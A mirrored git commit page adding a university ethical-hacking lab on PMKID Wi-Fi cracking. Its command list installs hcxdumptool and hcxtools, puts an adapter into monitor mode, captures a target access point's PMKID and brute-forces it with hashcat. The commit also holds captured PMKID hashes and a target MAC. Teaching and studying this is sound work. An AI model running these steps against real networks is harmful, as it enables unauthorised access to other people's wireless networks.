mirror of
https://github.com/frankwxu/Ubalt.git
synced 2026-02-21 11:17:56 +00:00
wireless PMKID hacking
This commit is contained in:
Binary file not shown.
BIN
EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx
Normal file
BIN
EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx
Normal file
Binary file not shown.
49
EthicalHacking/Labs/WirelessUsingPMKID/commands.txt
Normal file
49
EthicalHacking/Labs/WirelessUsingPMKID/commands.txt
Normal file
@@ -0,0 +1,49 @@
|
||||
apt-get update
|
||||
apt-get dist-upgrade -y
|
||||
apt-get install libssl-dev
|
||||
apt-get install libz-dev
|
||||
apt-get install libpcap-dev -y
|
||||
apt-get install libcurl4-openssl-dev
|
||||
|
||||
git clone https://github.com/ZerBea/hcxdumptool
|
||||
cd hcxdumptool
|
||||
make
|
||||
make install
|
||||
hcxdumptool -h
|
||||
hcxdumptool --version
|
||||
|
||||
git clone https://github.com/ZerBea/hcxtools.git
|
||||
cd hcxtools
|
||||
make
|
||||
make install
|
||||
hcxpcptool -h
|
||||
hcxpcptool -v
|
||||
|
||||
hashcat -h
|
||||
hashcat --version
|
||||
|
||||
mkdir crack_PMKID
|
||||
cd crack_PMKID
|
||||
|
||||
airmon-ng start wlan0
|
||||
airodump-ng wlan0mon
|
||||
echo '<AP mac address without :' > mac.txt /
|
||||
cat mac.txt
|
||||
hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3
|
||||
hcxpcaptool -z hashtocrack hash
|
||||
cat hashtocrack
|
||||
|
||||
|
||||
hashcat -m 16800 hashtocrack -a 3 -w 3 abcdef?l?l --force --potfile-disable
|
||||
|
||||
|
||||
//-a -3 : attack model: brute-force
|
||||
//-w 3: -workload-profile: high performance
|
||||
// potfile: the potfile stores which hashes were already cracked, and thus won't be cracked again.
|
||||
|
||||
1: hcxdumptool v4.2.0 or higher: https://github.com/ZerBea/hcxdumptool
|
||||
2: hcxtools v4.2.0 or higher: https://github.com/ZerBea/hcxtools
|
||||
3: hashcat v4.2.0 or higher: https://github.com/hashcat/hashcat
|
||||
|
||||
Tutorial
|
||||
https://www.youtube.com/watch?v=DarsUXcHTSU
|
||||
BIN
EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash
Normal file
BIN
EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash
Normal file
Binary file not shown.
@@ -0,0 +1,2 @@
|
||||
d2302924c11c4ccb071f19be8c3d7273*4a5d3606cfc9*f0a225762645*46694f532d43384f47592d4775657374
|
||||
3726d31693692c5aa9a10c4a363aad7e*485d363c3d10*0c47c90cdb5c*46694f532d52454d4f32
|
||||
@@ -0,0 +1 @@
|
||||
4A5D3606CFC9
|
||||
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user